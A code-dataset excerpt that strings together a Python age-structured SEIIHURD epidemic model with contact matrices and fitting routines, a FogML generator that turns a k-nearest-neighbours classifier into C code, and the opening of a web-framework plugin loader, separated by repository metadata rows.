5.72506883e-002, 4.70559232e-002, 4.28736553e-002,
2.42614518e-002, 2.86665377e-002, 1.29570473e-002,
3.24362518e-003, 1.67930318e-003, 6.20916950e-134,
3.27297624e-072],
[1.72765646e-002, 3.43744913e-001, 4.30902785e-001,
4.74293073e-001, 5.39328187e-003, 1.44128740e-002,
3.95545363e-002, 3.73781860e-002, 4.56834488e-002,
5.92135906e-002, 2.91473801e-002, 1.54857502e-002,
4.53105390e-003, 8.87272668e-024, 1.23797452e-117,
5.64262349e-078],
[6.14363036e-002, 2.98367348e-001, 2.59092700e-001,
3.00800812e-001, 5.92454596e-003, 5.26458862e-002,
2.02188672e-002, 3.27897605e-002, 4.07753741e-002,
2.83422407e-002, 2.43657809e-002, 2.73993226e-002,
8.87990718e-003, 1.13279180e-031, 7.81960493e-004,
7.62467510e-004],
[3.63695643e-002, 5.96870355e-002, 3.05072624e-002,
1.45523978e-001, 1.26062984e-002, 1.69458169e-003,
1.55127292e-002, 4.22097670e-002, 9.21792425e-003,
1.42200652e-002, 1.10967529e-002, 5.77020348e-003,
2.04474044e-002, 1.11075734e-002, 4.42271199e-067,
2.12068625e-037],
[1.67937029e-003, 2.72971001e-002, 1.05886266e-002,
7.61087735e-032, 1.97191559e-003, 1.92885006e-003,
1.24343737e-002, 5.39297787e-003, 5.41684968e-003,
8.63502071e-003, 1.94554498e-003, 1.49082274e-002,
8.11781100e-003, 1.74395489e-002, 1.11239023e-002,
3.45693088e-126],
[1.28088348e-028, 5.11065200e-026, 1.93019797e-040,
7.60476035e-003, 2.63586947e-022, 1.69749024e-024,
1.25875005e-026, 7.62109877e-003, 7.84979948e-003,
2.11516023e-002, 3.52117832e-002, 2.14360383e-002,
7.73902109e-003, 8.01328325e-003, 7.91285055e-003,
2.13825814e-002],
[2.81655586e-094, 2.11305187e-002, 8.46562506e-042,
2.12592841e-002, 4.89802057e-036, 7.59232387e-003,
9.77247001e-069, 2.23108239e-060, 1.43715978e-048,
8.56015694e-060, 4.69469043e-042, 1.59822047e-046,
2.20978550e-083, 8.85861277e-107, 1.02042815e-080,
6.61413913e-113]])
Mu_work = np.array([[0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 8.20604524e-092, 1.20585150e-005,
3.16436834e-125],
[0.00000000e+000, 1.16840561e-003, 9.90713236e-072,
4.42646396e-059, 2.91874286e-006, 9.98773031e-003,
2.58779981e-002, 5.66104376e-003, 2.12699812e-002,
5.72117462e-003, 1.48212306e-003, 1.23926126e-003,
1.28212945e-056, 1.34955578e-005, 7.64591325e-079,
2.38392073e-065],
[0.00000000e+000, 2.56552144e-003, 1.12756182e-001,
2.40351143e-002, 2.62981485e-002, 7.56512432e-003,
6.19587609e-002, 1.73269871e-002, 5.87405128e-002,
3.26749742e-002, 1.24709193e-002, 2.93054408e-008,
3.71596993e-017, 2.79780317e-053, 4.95800770e-006,
3.77718083e-102],
[0.00000000e+000, 1.07213881e-002, 4.28390448e-002,
7.22769090e-001, 5.93479736e-001, 3.39341952e-001,
3.17013715e-001, 2.89168861e-001, 3.11143180e-001,
2.34889238e-001, 1.32953769e-001, 6.01944097e-002,
1.47306181e-002, 8.34699602e-006, 2.85972822e-006,
1.88926122e-031],
[0.00000000e+000, 9.14252587e-003, 5.74508682e-002,
4.00000235e-001, 7.93386618e-001, 7.55975146e-001,
6.32277283e-001, 6.83601459e-001, 4.98506972e-001,
3.82309992e-001, 2.81363576e-001, 1.23338103e-001,
4.15708021e-002, 9.86113407e-006, 1.32609387e-005,
3.74318048e-006],
[0.00000000e+000, 1.04243481e-002, 7.34587492e-002,
3.49556755e-001, 7.50680101e-001, 1.25683393e+000,
9.01245714e-001, 8.63446835e-001, 7.70443641e-001,
5.17237071e-001, 4.09810981e-001, 1.80645400e-001,
5.51284783e-002, 1.60674627e-005, 1.01182608e-005,
3.01442534e-006],
[0.00000000e+000, 1.65842404e-002, 8.34076781e-002,
1.89301935e-001, 5.21246906e-001, 8.54460001e-001,
1.12054931e+000, 9.64310078e-001, 8.34675180e-001,
6.52534012e-001, 3.79383514e-001, 2.11198205e-001,
5.17285688e-002, 1.63795563e-005, 4.10100851e-006,
3.49478980e-006],
[0.00000000e+000, 1.11666639e-002, 5.03319748e-002,
3.70510313e-001, 4.24294782e-001, 7.87535547e-001,
8.45085693e-001, 1.14590365e+000, 1.07673077e+000,
7.13492115e-001, 5.00740004e-001, 1.90102207e-001,
3.59740115e-002, 1.22988530e-005, 9.13512833e-006,
6.02097416e-006],
[0.00000000e+000, 6.07792440e-003, 5.49337607e-002,
2.23499535e-001, 4.82353827e-001, 7.52291991e-001,
8.89187601e-001, 9.33765370e-001, 1.10492283e+000,
8.50124391e-001, 5.88941528e-001, 1.94947085e-001,
5.09477228e-002, 1.43626161e-005, 1.02721567e-005,
1.29503893e-005],
[0.00000000e+000, 3.31622551e-003, 7.01829848e-002,
2.67512972e-001, 3.14796392e-001, 5.41516885e-001,
6.95769048e-001, 7.50620518e-001, 7.50038547e-001,
7.00954088e-001, 4.35197983e-001, 2.11283335e-001,
3.88576200e-002, 1.62810370e-005, 1.08243610e-005,
6.09172339e-006],
[0.00000000e+000, 4.39576425e-004, 7.17737968e-002,
1.89254612e-001, 2.47832532e-001, 5.16027731e-001,
6.02783971e-001, 6.15949277e-001, 8.05581107e-001,
7.44063535e-001, 5.44855374e-001, 2.52198706e-001,
4.39235685e-002, 1.18079721e-005, 1.18226645e-005,
1.01613165e-005],
[0.00000000e+000, 4.91737561e-003, 1.08686672e-001,
1.24987806e-001, 1.64110983e-001, 3.00118829e-001,
4.18159745e-001, 3.86897613e-001, 4.77718241e-001,
3.60854250e-001, 3.22466456e-001, 1.92516925e-001,
4.07209694e-002, 1.34978304e-005, 6.58739925e-006,
6.65716756e-006],
[0.00000000e+000, 6.35447018e-004, 3.96329620e-002,
1.83072502e-002, 7.04596701e-002, 1.24861117e-001,
1.37834574e-001, 1.59845720e-001, 1.66933479e-001,
1.56084857e-001, 1.14949158e-001, 8.46570798e-002,
1.50879843e-002, 2.03019580e-005, 8.26102156e-006,
1.48398182e-005],
[7.60299521e-006, 3.36326754e-006, 7.64855296e-006,
2.27621532e-005, 3.14933351e-005, 7.89308410e-005,
7.24212842e-005, 2.91748203e-005, 6.61873732e-005,
5.95693238e-005, 7.70713500e-005, 5.30687748e-005,
4.66030117e-005, 1.41633235e-005, 2.49066205e-005,
1.19109038e-005],
[5.78863840e-055, 7.88785149e-042, 2.54830412e-006,
2.60648191e-005, 1.68036205e-005, 2.12446739e-005,
3.57267603e-005, 4.02377033e-005, 3.56401935e-005,
3.09769252e-005, 2.13053382e-005, 4.49709414e-005,
2.61368373e-005, 1.68266203e-005, 1.66514322e-005,
2.60822813e-005],
[2.35721271e-141, 9.06871674e-097, 1.18637122e-089,
9.39934076e-022, 4.66000452e-005, 4.69664011e-005,
4.69316082e-005, 8.42184044e-005, 2.77788168e-005,
1.03294378e-005, 1.06803618e-005, 7.26341826e-075,
1.10073971e-065, 1.02831671e-005, 5.16902994e-049,
8.28040509e-043]])
Mu_other = np.array([[0.95537734, 0.46860132, 0.27110607, 0.19447667, 0.32135073,
0.48782072, 0.54963024, 0.42195593, 0.27152038, 0.17864251,
0.20155642, 0.16358271, 0.1040159 , 0.0874149 , 0.05129938,
0.02153823],
[0.51023519, 2.17757364, 0.9022516 , 0.24304235, 0.20119518,
0.39689588, 0.47242431, 0.46949918, 0.37741651, 0.16843746,
0.12590504, 0.12682331, 0.11282247, 0.08222718, 0.03648526,
0.02404257],
[0.18585796, 1.11958124, 4.47729443, 0.67959759, 0.43936317,
0.36934142, 0.41566744, 0.44467286, 0.48797422, 0.28795385,
0.17659191, 0.10674831, 0.07175567, 0.07249261, 0.04815305,
0.03697862],
[0.09854482, 0.3514869 , 1.84902386, 5.38491613, 1.27425161,
0.59242579, 0.36578735, 0.39181798, 0.38131832, 0.31501028,
0.13275648, 0.06408612, 0.04499218, 0.04000664, 0.02232326,
0.01322698],
[0.13674436, 0.1973461 , 0.33264088, 2.08016394, 3.28810184,
1.29198125, 0.74642201, 0.44357051, 0.32781391, 0.35511243,
0.20132011, 0.12961 , 0.04994553, 0.03748657, 0.03841073,
0.02700581],
[0.23495203, 0.13839031, 0.14085679, 0.5347385 , 1.46021275,
1.85222022, 1.02681162, 0.61513602, 0.39086271, 0.32871844,
0.25938947, 0.13520412, 0.05101963, 0.03714278, 0.02177751,
0.00979745],
[0.23139098, 0.18634831, 0.32002214, 0.2477269 , 0.64111274,
0.93691022, 1.14560725, 0.73176025, 0.43760432, 0.31057135,
0.29406937, 0.20632155, 0.09044896, 0.06448983, 0.03041877,
0.02522842],
[0.18786196, 0.25090485, 0.21366969, 0.15358412, 0.35761286,
0.62390736, 0.76125666, 0.82975354, 0.54980593, 0.32778339,
0.20858991, 0.1607099 , 0.13218526, 0.09042909, 0.04990491,
0.01762718],
[0.12220241, 0.17968132, 0.31826246, 0.19846971, 0.34823183,
0.41563737, 0.55930999, 0.54070187, 0.5573184 , 0.31526474,
0.20194048, 0.09234293, 0.08377534, 0.05819374, 0.0414762 ,
0.01563101],
[0.03429527, 0.06388018, 0.09407867, 0.17418896, 0.23404519,
0.28879108, 0.34528852, 0.34507961, 0.31461973, 0.29954426,
0.21759668, 0.09684718, 0.06596679, 0.04274337, 0.0356891 ,
0.02459849],
[0.05092152, 0.10829561, 0.13898902, 0.2005828 , 0.35807132,
0.45181815, 0.32281821, 0.28014803, 0.30125545, 0.31260137,
0.22923948, 0.17657382, 0.10276889, 0.05555467, 0.03430327,
0.02064256],
[0.06739051, 0.06795035, 0.0826437 , 0.09522087, 0.23309189,
0.39055444, 0.39458465, 0.29290532, 0.27204846, 0.17810118,
0.24399007, 0.22146653, 0.13732849, 0.07585801, 0.03938794,
0.0190908 ],
[0.04337917, 0.05375367, 0.05230119, 0.08066901, 0.16619572,
0.25423056, 0.25580913, 0.27430323, 0.22478799, 0.16909017,
0.14284879, 0.17211604, 0.14336033, 0.10344522, 0.06797049,
0.02546014],
[0.04080687, 0.06113728, 0.04392062, 0.04488748, 0.12808591,
0.19886058, 0.24542711, 0.19678011, 0.17800136, 0.13147441,
0.13564091, 0.14280335, 0.12969805, 0.11181631, 0.05550193,
0.02956066],
[0.01432324, 0.03441212, 0.05604694, 0.10154456, 0.09204 ,
0.13341443, 0.13396901, 0.16682638, 0.18562675, 0.1299677 ,
0.09922375, 0.09634331, 0.15184583, 0.13541738, 0.1169359 ,
0.03805293],
[0.01972631, 0.02274412, 0.03797545, 0.02036785, 0.04357298,
0.05783639, 0.10706321, 0.07688271, 0.06969759, 0.08029393,
0.05466604, 0.05129046, 0.04648653, 0.06132882, 0.05004289,
0.03030569]])
def generate_reduced_matrices(age_sep, Ni):
'''
Receives the age_separation and populations to generate the average contact
matrices, returns a (4, len(age_sep)+1, len(age_sep)+1) with the 4 partial
contact matrices: house, school, work and other
    Ni is the population for each population component (16 five-year age groups)
'''
nMat = len(age_sep) + 1
Ms = np.empty((4, nMat, nMat))
age_indexes = list()
age_indexes.append(np.flatnonzero(ages_Mu_min <= age_sep[0]))
for i in range(1, len(age_sep)):
age_indexes.append(np.flatnonzero((ages_Mu_min > age_sep[i-1]) *
(ages_Mu_min <= age_sep[i])))
age_indexes.append(np.flatnonzero(ages_Mu_min > age_sep[-1]))
for i in range(nMat):
Nia = Ni[age_indexes[i]]
Na = Nia.sum()
for j in range(nMat):
Ms[0,i,j] = (Nia * ((Mu_house[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[1,i,j] = (Nia * ((Mu_school[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[2,i,j] = (Nia * ((Mu_work[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
Ms[3,i,j] = (Nia * ((Mu_other[age_indexes[i]][:,age_indexes[j]]).sum(axis=1))).sum()/Na
return Ms
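# Illustrative usage of generate_reduced_matrices (added example, not part of
# the original code; the age cut points and the uniform population below are
# assumptions chosen only for demonstration):
#   example_age_sep = [19, 59]                  # groups: 0-19, 20-59, 60+
#   example_Ni = np.full(16, 1.0e4)             # population of each 5-year band
#   M_house, M_school, M_work, M_other = generate_reduced_matrices(example_age_sep, example_Ni)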
class SEIIHURD_age:
''' SEIIHURD Model'''
def __init__(self,tamanhoPop,numeroProcessadores=None):
self.N = tamanhoPop
self.numeroProcessadores = numeroProcessadores
self.pos = None
#pars dict betas, delta, kappa, p, gammaA, gammaS, h, epsilon, gammaH, gammaU, muU, muH, wU, wH
    # following the notation: beta_12 means group 2 infecting group 1, where 1 is the row and 2 the column.
def _SEIIHURD_age_eq(self, X, t, pars):
S, E, Ia, Is, H, U, R, D, Nw = np.split(X, 9)
StE = S * (pars['beta'] @ ((Ia * pars['delta'] + Is).reshape((-1,1)))).flatten()
dS = - StE
dE = StE - pars['kappa'] * E
dIa = (1. - pars['p']) * pars['kappa'] * E - pars['gammaA'] * Ia
dIs = pars['p'] * pars['kappa'] * E - pars['gammaS'] * Is
dH = pars['h'] * pars['xi'] * pars['gammaS'] * Is + (1 - pars['muU'] +\
pars['wU'] * pars['muU']) * pars['gammaU'] * U - pars['gammaH'] * H
dU = pars['h'] * (1 - pars['xi']) * pars['gammaS'] * Is + pars['wH'] *\
pars['gammaH'] * H - pars['gammaU'] * U
dR = pars['gammaA'] * Ia + (1. - pars['h']) * pars['gammaS'] * Is + \
(1 - pars['muH']) * (1 - pars['wH']) * pars['gammaH'] * H
dD = (1 - pars['wH']) * pars['muH'] * pars['gammaH'] * H + \
(1 - pars['wU']) * pars['muU'] * pars['gammaU'] * U
dNw = pars['p'] * pars['kappa'] * E
return np.r_[dS, dE, dIa, dIs, dH, dU, dR, dD, dNw]
def _call_ODE(self, ts, ppars):
betas = ppars['beta'].copy()
pars = copy.deepcopy(ppars)
if 'tcut' not in ppars.keys():
tcorte = None
else:
tcorte = pars['tcut']
if type(ts) in [int, float]:
ts = np.arange(ts)
if tcorte == None:
tcorte = [ts[-1]]
if type(betas) != list:
betas = [betas]
if tcorte[-1] < ts[-1]:
tcorte.append(ts[-1])
tcorte = [ts[0]] + tcorte
tcorte.sort()
Is0 = pars['x0'].reshape((3,-1)).sum(axis=0)
x0 = np.r_[1. - Is0, pars['x0'], np.zeros(4*len(Is0)), pars['x0'][2*len(Is0):]]
saida = x0.reshape((1,-1))
Y = saida.copy()
for i in range(1, len(tcorte)):
cut_last = False
pars['beta'] = betas[i-1]
t = ts[(ts >= tcorte[i-1]) * (ts<= tcorte[i])]
if len(t) > 0:
if t[0] > tcorte[i-1]:
t = np.r_[tcorte[i-1], t]
if t[-1] < tcorte[i]:
t = np.r_[t, tcorte[i]]
cut_last = True
Y = spi.odeint(self._SEIIHURD_age_eq, Y[-1], t, args=(pars,))
if cut_last:
saida = np.r_[saida, Y[1:-1]]
else:
saida = np.r_[saida, Y[1:]]
else:
Y = spi.odeint(self._SEIIHURD_age_eq, Y[-1], tcorte[i-1:i+1], args=(pars,))
return ts, saida
def _fill_paramPSO(self, paramPSO):
if 'options' not in paramPSO.keys():
paramPSO['options'] = {'c1': 0.1, 'c2': 0.3, 'w': 0.9,'k':5,'p':2}
if 'n_particles' not in paramPSO.keys():
paramPSO['n_particles'] = 300
if 'iter' not in paramPSO.keys():
paramPSO['iter'] = 1000
return paramPSO
def _prepare_input(self, data):
list_states = ['S', 'E', 'Ia', 'Is', 'H', 'U', 'R', 'D', 'Nw']
i_integ = list()
Y = list()
for ke in data.keys():
if ke == 't':
t = data[ke]
else:
Y.append(data[ke])
simb, num = ke.split("_")
n0 = self.nages * list_states.index(simb)
if '_ALL' in ke:
i_integ.append(list(range(n0,n0 + self.nages)))
else:
i_integ.append(int(num) + n0)
return i_integ, Y, t
def _prepare_conversor(self, p2f, pothers, bound):
padjus = list()
if bound != None:
bound_new = [[], []]
for i, par in enumerate(p2f):
if 'beta' in par:
if '_ALL' in par:
for l in range(len(pothers['beta'])):
for j in range(pothers['beta'][i].shape[0]):
for k in range(pothers['beta'][i].shape[1]):
padjus.append('beta_{}_{}_{}'.format(l,j,k))
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
else:
padjus.append(par)
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
elif '_ALL' in par:
name = par.split('_')[0]
for j in range(len(pothers[name])):
padjus.append('{}_{}'.format(name, j))
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
else:
padjus.append(par)
if bound != None:
bound_new[0].append(bound[0][i])
bound_new[1].append(bound[1][i])
if bound != None:
bound_new[0] = np.array(bound_new[0])
bound_new[1] = np.array(bound_new[1])
return bound_new, padjus
def _conversor(self, coefs, pars0, padjus):
pars = copy.deepcopy(pars0)
for i, coef in enumerate(coefs):
if 'beta' in padjus[i]:
if '_M_' in padjus[i]:
indx = int(padjus[i].split('_')[-1])
pars['beta'][indx] = coef * pars['beta'][indx]
else:
indx = padjus[i].split('_')
pars['beta'][int(indx[1])][int(indx[2]), int(indx[3])] = coef
elif '_' in padjus[i]:
name, indx = padjus[i].split('_')
pars[name][int(indx)] = coef
else:
pars[padjus[i]] = coef
return pars
def objectiveFunction(self, coefs_list, stand_error=False, weights=None):
errsq = np.zeros(coefs_list.shape[0])
for i, coefs in enumerate(coefs_list):
errs = self._residuals(coefs, stand_error, weights)
errsq[i] = (errs*errs).mean()
return errsq
def _residuals(self, coefs, stand_error=False, weights=None):
if type(weights) == type(None):
weights = np.ones(len(self.Y))
error_func = (lambda x: np.sqrt(x+1)) if stand_error else (lambda x:np.ones_like(x))
errs = np.empty((0,))
ts, mY = self._call_ODE(self.t, self._conversor(coefs, self.pars_init, self.padjus))
for indY, indODE in enumerate(self.i_integ):
if type(indODE) == list:
temp = (self.N.reshape((1,-1)) * mY[:,indODE]).sum(axis=1)
errs = np.r_[errs, weights[indY] * ((self.Y[indY] - temp) / error_func(temp)) ]
else:
try:
errs = np.r_[errs, weights[indY] * ((self.Y[indY] - self.N[indODE%self.nages] * mY[:,indODE]) / error_func(mY[:,indODE])) ]
except:
print(self.t, self._conversor(coefs, self.pars_init, self.padjus))
raise
errs = errs[~np.isnan(errs)]
return errs
def prepare_to_fit(self, data, pars, pars_to_fit, bound=None, nages=1, stand_error=False):
self.pars_init = copy.deepcopy(pars)
self.nages = nages
self.i_integ, self.Y, self.t = self._prepare_input(data)
self.bound, self.padjus = self._prepare_conversor(pars_to_fit, pars, bound)
self.n_to_fit = len(self.padjus)
def fit(self, data, pars, pars_to_fit, bound=None, nages=2, paramPSO=dict(), stand_error=False):
'''
data: dictionary:
t -> times
X_N -> variable:
                X is the symbol of the variable: S, E, Ia, Is, H, U, R, D, Nw
                N is the index of the age group, starting at 0
        pars: dictionary, with the parameter names as keys.
        pars_to_fit: the names of the parameters to fit; if the parameter is a list,
            add _N with the index you want to fit, or _ALL to fit all entries.
            The 'beta' parameter has 3 indexes: beta_I_J_K, with I indicating
            which tcut it belongs to and J_K indicating the position in the matrix.
            beta also has an option 'beta_M_I' that fits a multiplicative
            constant of the infection matrix, without changing the relative weights
            (the _M_ and _ALL_ options are incompatible for now, and _M_ requires
            testing).
        bound = search interval for each parameter, where None = no limit
        bound => (min_bound_list, max_bound_list)
'''
paramPSO = self._fill_paramPSO(paramPSO)
self.prepare_to_fit(data, pars, pars_to_fit, bound=bound, nages=nages, stand_error=stand_error)
optimizer = ps.single.LocalBestPSO(n_particles=paramPSO['n_particles'], dimensions=self.n_to_fit, options=paramPSO['options'],bounds=self.bound)
cost = pos = None
cost, pos = optimizer.optimize(self.objectiveFunction,paramPSO['iter'], stand_error=stand_error, n_processes=self.numeroProcessadores)
self.pos = pos
self.pars_opt = self._conversor(pos, self.pars_init, self.padjus )
self.rmse = cost
self.optimize = optimizer
def fit_lsquares(self, data, pars, pars_to_fit, bound=None, nages=2, stand_error=False, init=None, nrand=10):
self.prepare_to_fit(data, pars, pars_to_fit, bound=bound, nages=nages, stand_error=stand_error)
if init == None:
cost_best = np.inf
res_best = None
#BUG: the parallel code does not work if PSO code had run previously
if type(self.pos) != type(None) or self.numeroProcessadores == None or self.numeroProcessadores <= 1:
for i in range(nrand):
print("{} / {}".format(i, nrand))
par0 = np.random.rand(self.n_to_fit)
par0 = self.bound[0] + par0 * (self.bound[1] - self.bound[0])
res = least_squares(self._residuals, par0, bounds=self.bound)
if res.cost < cost_best:
cost_best = res.cost
res_best = res
else:
par0 = np.random.rand(nrand, self.n_to_fit)
par0 = self.bound[0].reshape((1,-1)) + par0 * (self.bound[1] - self.bound[0]).reshape((1,-1))
f = lambda p0: least_squares(self._residuals, p0, bounds=self.bound)
all_res = joblib.Parallel(n_jobs=self.numeroProcessadores)(joblib.delayed(f)(p0,) for p0 in par0)
costs = np.array([res.cost for res in all_res])
cost_best = all_res[costs.argmin()].cost
res_best = all_res[costs.argmin()]
else:
res_best = least_squares(self._residuals, init, bounds=bound )
self.pos_ls = res_best.x
self.pars_opt_ls = self._conversor(res_best.x, self.pars_init, self.padjus )
self.rmse_ls = (res_best.fun**2).mean()
self.result_ls = res_best
def predict(self, t=None, coefs=None, model_output=False):
if type(t) == type(None):
t = self.t
if type(coefs) == type(None):
coefs = self.pos
elif type(coefs) == str and coefs == 'LS':
coefs = self.pos_ls
ts, mY = self._call_ODE(t, self._conversor(coefs, self.pars_init, self.padjus))
saida = np.zeros((len(ts), 0))
for i in self.i_integ:
if type(i) == list:
ytemp = (mY[:,i] *self.N.reshape((1,-1))).sum(axis=1)
else:
ytemp = mY[:,i] * self.N[i%self.nages]
saida = np.c_[saida, ytemp.reshape((-1,1))]
if model_output:
return ts, saida, mY
else:
return ts, saida
#ts, X = call_ODE(X0, tmax, betas, param, tcorte=tcorte)
#plt.plot(ts, X[:,:2], '.-')
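# Illustrative usage of SEIIHURD_age (added example, not part of the original
# code). Every value below -- populations, rates, initial conditions and the
# observed series -- is a made-up placeholder; it only documents the expected
# call sequence and data layout for two age groups:
#   N = np.array([6.0e5, 4.0e5])                        # population per age group
#   model = SEIIHURD_age(N, numeroProcessadores=1)
#   pars = {'beta': [np.full((2, 2), 1.0e-6)],
#           'delta': 0.6, 'kappa': 0.25, 'p': 0.2,
#           'gammaA': 1/3.5, 'gammaS': 0.25, 'h': np.array([0.05, 0.2]),
#           'xi': 0.53, 'gammaH': 0.14, 'gammaU': 0.14,
#           'muH': 0.15, 'muU': 0.4, 'wH': 0.14, 'wU': 0.14,
#           'x0': np.array([1e-4, 1e-4, 1e-4, 1e-4, 1e-4, 1e-4])}  # [E, Ia, Is] per group
#   data = {'t': np.arange(60), 'D_ALL': observed_deaths, 'Nw_ALL': observed_cases}
#   model.fit(data, pars, ['beta_0_0_0', 'p'],
#             bound=([0., 0.], [1e-5, 1.]), nages=2)
#   ts, fitted = model.predict()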
| 48.936267
| 152
| 0.593135
| 12,347
| 0.38271
| 0
| 0
| 0
| 0
| 0
| 0
| 2,729
| 0.084589
|
a1fac0722dfead6d7d06eddcce884f4ba1c9a684
| 2,447
|
py
|
Python
|
src/fogml/generators/knn_code_generator.py
|
bkulawska/FogML
|
fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a
|
[
"Apache-2.0"
] | null | null | null |
src/fogml/generators/knn_code_generator.py
|
bkulawska/FogML
|
fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a
|
[
"Apache-2.0"
] | null | null | null |
src/fogml/generators/knn_code_generator.py
|
bkulawska/FogML
|
fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import os
from sklearn.neighbors import KNeighborsClassifier
from .base_generator import BaseGenerator
class KNNCodeGenerator(BaseGenerator):
skeleton_path = "skeletons/knn_skeleton.txt"
def __init__(self, clf: KNeighborsClassifier):
self.clf = clf
@staticmethod
def generate_c_matrix(matrix):
result = "{\n"
for i in range(matrix.shape[0]):
result += "{"
for j in range(matrix.shape[1]):
result += "%.6f, " % matrix[i][j]
result += "},\n"
result += "}"
return result
@staticmethod
def generate_c_array(array):
result = "{"
for i in range(len(array)):
result += "%.6f, " % array[i]
result += "}"
return result
def generate_zero_array(self, size):
zero_array = np.zeros(size)
return self.generate_c_array(zero_array)
def metric_calculation(self, metric):
if metric == "euclidean":
return "res += pow2(x[j] - attributes[i][j])"
elif metric == "manhattan":
return "res += abs2(x[j] - attributes[i][j])"
elif metric == "chebyshev":
return "res = max2(res, abs2(x[j] - attributes[i][j]))"
pass
def generate(self, fname="knn_model.c", cname="classifier", **kwargs):
classes = len(self.clf.classes_)
features = self.clf.n_features_in_
k = self.clf.n_neighbors
fit_X = np.array(self.clf._fit_X)
Y = np.array(self.clf._y)
with open(os.path.join(os.path.dirname(__file__), self.skeleton_path)) as skeleton:
code = skeleton.read()
code = self.license_header() + code
code = code.replace('<class_count>', str(classes))
code = code.replace('<features>', str(features))
code = code.replace('<k_neighbours>', str(k))
code = code.replace('<members>', str(len(self.clf._fit_X)))
code = code.replace('<dataset_features>', self.generate_c_matrix(fit_X))
code = code.replace('<member_class>', self.generate_c_array(Y))
code = code.replace('<class_count_empty>', self.generate_zero_array(classes))
code = code.replace('<cname>', cname)
code = code.replace('<metric>', self.metric_calculation(self.clf.metric))
with open(fname, 'w') as output_file:
output_file.write(code)
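# Illustrative usage (added example, not part of the original code; the toy
# dataset and output file name are placeholders): fit a scikit-learn KNN
# classifier and emit the corresponding C source with this generator.
#   from sklearn.datasets import load_iris
#   X, y = load_iris(return_X_y=True)
#   clf = KNeighborsClassifier(n_neighbors=3, metric="euclidean").fit(X, y)
#   KNNCodeGenerator(clf).generate(fname="knn_model.c", cname="classifier")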
| 34.957143
| 91
| 0.585206
| 2,320
| 0.9481
| 0
| 0
| 495
| 0.202289
| 0
| 0
| 382
| 0.15611
|
a1fbd1b0e28715e9bf42d61fcecc21a928f44f08
| 8,719
|
py
|
Python
|
modules/plugins/__init__.py
|
sungkomp/sambro
|
4618d785d03424d122206d88d9ebfb6971486e2c
|
[
"MIT"
] | 5
|
2017-02-03T16:29:43.000Z
|
2018-12-17T15:43:36.000Z
|
modules/plugins/__init__.py
|
sungkomp/sambro
|
4618d785d03424d122206d88d9ebfb6971486e2c
|
[
"MIT"
] | 84
|
2016-04-11T12:47:42.000Z
|
2019-05-27T03:46:09.000Z
|
modules/plugins/__init__.py
|
sungkomp/sambro
|
4618d785d03424d122206d88d9ebfb6971486e2c
|
[
"MIT"
] | 3
|
2016-11-29T15:27:18.000Z
|
2019-10-15T02:46:45.000Z
|
# -*- coding: utf-8 -*-
import os
import sys
# 'reload' is a builtin only on Python 2; on Python 3 it lives in importlib
try:
    from importlib import reload
except ImportError:
    pass
from gluon import current
from gluon.storage import Storage
__all__ = ("PluginLoader",
)
# Name of the plugin directory in modules
PLUGINS = "plugins"
# Module names to ignore when scanning for plugins
IGNORE = ("skeleton", "__init__")
# Name of the setup function in plugins
SETUP = "setup"
# Name of the variable that contains the version info in plugins
VERSION = "__version__"
# =============================================================================
class PluginLoader(object):
"""
Simple plugin loader (experimental)
Plugins are python modules or packages in the modules/plugins
directory.
Each plugin defines a setup() function which is called during
the request cycle immediately before entering the controller.
Plugins can be added by simply placing them in the plugins
directory, without any code change required.
The plugin directory will be scanned for new or updated plugins
whenever a new session starts, or by calling explicitly:
PluginLoader.detect(reset_all=True)
NB the reloading of the plugins can only be enforced in the
current interpreter thread - while other threads may still
run the old version. Therefore, it is recommended to restart
all threads (=reloading the server) after installing or updating
a plugin.
NB failing setup() methods will not be tried again until the next
reload (new session, restart, or explicit call)
session.s3.plugins contains a dict of all current plugins, like:
{name: (version, status)}
where:
- name is the python module name of the plugin
- version is the version string provided by the plugin (or
"unknown" if not present)
- status is:
None = newly detected plugin, not set up yet
True = plugin has been set up successfully
False = plugin setup failed in the last attempt, deactivated
"""
# -------------------------------------------------------------------------
@classmethod
def setup_all(cls, reload_all=False):
"""
Setup all plugins
@param reload_all: reload all plugins and reset the registry
"""
if reload_all:
cls.detect(reset_all=True)
for name in cls._registry().keys():
cls.load(name)
# -------------------------------------------------------------------------
@classmethod
def detect(cls, reset_all=False):
"""
Detect new plugins and update the registry
@param reset_all: reset all entries in the registry
"""
default = (None, None)
if reset_all:
plugin = lambda name: default
else:
registry = cls._registry()
plugin = lambda name: registry.get(name, default)
plugins = dict((name, plugin(name)) for name in cls._scan())
cls._registry(plugins)
# -------------------------------------------------------------------------
@classmethod
def load(cls, name, force=False):
"""
Run the setup method of a particular plugin
@param name: the name of the plugin
@param force: enforce the plugin to be reloaded and its
setup method to be re-run regardless of the
previous status
"""
log = current.log
registry = cls._registry()
if name not in registry:
cls.detect()
if name not in registry:
raise NameError("plugin '%s' not found" % name)
# Get version and status info from registry
plugin_info = registry[name]
if force or not isinstance(plugin_info, tuple):
version, status = None, None
else:
version, status = plugin_info
if status is None:
new = True
if not (cls._reload(name)):
version, status = "unknown", False
else:
version, status = None, True
else:
new = False
if status is False:
# Skip plugins which have failed in previous attempts
registry[name] = (version, status)
return False
status = True
setup = None
# Import manifest
package = "%s.%s" % (PLUGINS, name)
try:
setup = getattr(__import__(package, fromlist=[SETUP]), SETUP)
except (ImportError, AttributeError):
# This may not be a plugin at all => remove from registry
if new:
log.debug("Plugin '%s' not found" % name)
registry.pop(name, None)
return False
except SyntaxError:
if new:
log.error("Skipping invalid plugin '%s'" % name)
if current.response.s3.debug:
raise
version, status = "invalid", False
if version is None:
# Update version info if plugin has been reloaded
try:
version = getattr(__import__(package, fromlist=[VERSION]), VERSION)
